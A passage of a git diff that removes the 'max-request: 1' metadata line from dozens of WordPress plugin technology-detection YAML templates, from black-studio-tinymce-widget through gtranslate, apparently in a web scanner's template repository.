--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata:
- max-request: 1
plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6f..212b2b13c4b 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
- max-request: 1
plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce1..6318392c5cb 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breeze/
metadata:
- max-request: 1
plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936dc..e1a2a186e07 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/broken-link-checker/
metadata:
- max-request: 1
plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f3..23614882a79 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/child-theme-configurator/
metadata:
- max-request: 1
plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b4..85965337cbe 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-editor/
metadata:
- max-request: 1
plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a247557..33d903a1b49 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-widgets/
metadata:
- max-request: 1
plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b275..3c6f8f287b2 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata:
- max-request: 1
plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08b..c3b630cde2a 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cmb2/
metadata:
- max-request: 1
plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7f..5c8ce709b6d 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coblocks/
metadata:
- max-request: 1
plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0ea..aea47b9e845 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/code-snippets/
metadata:
- max-request: 1
plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360e..78c584c3889 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coming-soon/
metadata:
- max-request: 1
plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3ea..2c80d09c27d 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/complianz-gdpr/
metadata:
- max-request: 1
plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c0..4b1b3a87543 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/
metadata:
- max-request: 1
plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635a..06ad83bdf70 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7/
metadata:
- max-request: 1
plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c0397659295..b20666268fb 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-cfdb7/
metadata:
- max-request: 1
plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b6..b2a097bfe79 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-law-info/
metadata:
- max-request: 1
plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c8542..c71fa258afe 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-notice/
metadata:
- max-request: 1
plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a92..5a98e675971 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creame-whatsapp-me/
metadata:
- max-request: 1
plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49cec..44631742032 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata:
- max-request: 1
plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb4..cfac0b961bf 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-css-js/
metadata:
- max-request: 1
plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d3..846761f2f72 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-fonts/
metadata:
- max-request: 1
plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9b..0def6e61ca9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
metadata:
- max-request: 1
plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507a..5c5decc127d 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-comments/
metadata:
- max-request: 1
plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1e..a8229a338e1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-gutenberg/
metadata:
- max-request: 1
plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6e..6559e64dcef 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-page/
metadata:
- max-request: 1
plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d43..a4368b8aa6d 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-post/
metadata:
- max-request: 1
plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd4..ec119e762af 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicator/
metadata:
- max-request: 1
plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a78..b7ec7576a3f 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata:
- max-request: 1
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3e..c42d679973d 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-fancybox/
metadata:
- max-request: 1
plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb6..fc44375947c 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-table-of-contents/
metadata:
- max-request: 1
plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b238322971..a1616c17419 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-wp-smtp/
metadata:
- max-request: 1
plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc639..6cfb8bc272a 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementor/
metadata:
- max-request: 1
plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d7256..9caaa53263b 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementskit-lite/
metadata:
- max-request: 1
plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac947..5e6b5579527 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/enable-media-replace/
metadata:
- max-request: 1
plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed25..c5a665e6f74 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/envato-elements/
metadata:
- max-request: 1
plugin_namespace: envato-elements
wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef4..a8b56b5df0c 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata:
- max-request: 1
plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee65..4e20e571077 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ewww-image-optimizer/
metadata:
- max-request: 1
plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a3..6f6a4165953 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/
metadata:
- max-request: 1
plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b7720780..2dd0ef57b52 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fast-indexing-api/
metadata:
- max-request: 1
plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d4..11942f4fa47 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata:
- max-request: 1
plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88b..87c2aeb4bde 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/flamingo/
metadata:
- max-request: 1
plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb44758..3696eefbf79 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fluentform/
metadata:
- max-request: 1
plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbdc..8bab0a9c3ea 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/font-awesome/
metadata:
- max-request: 1
plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e1..affd2701239 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata:
- max-request: 1
plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d4146955..1e6a62e23b6 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/formidable/
metadata:
- max-request: 1
plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8b..980265f5311 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/forminator/
metadata:
- max-request: 1
plugin_namespace: forminator
wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec8..daf205789dd 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ga-google-analytics/
metadata:
- max-request: 1
plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb5946..22bfa3ffe23 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
- max-request: 1
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291b..7ed171d662c 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata:
- max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337ec..ad238445fcc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata:
- max-request: 1
plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313b..71616719609 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-listings-and-ads/
metadata:
- max-request: 1
plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7e..2678f603c61 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-site-kit/
metadata:
- max-request: 1
plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56db..20d947a5d1f 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-sitemap-generator/
metadata:
- max-request: 1
plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a698..22ee97b51f6 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
reference:
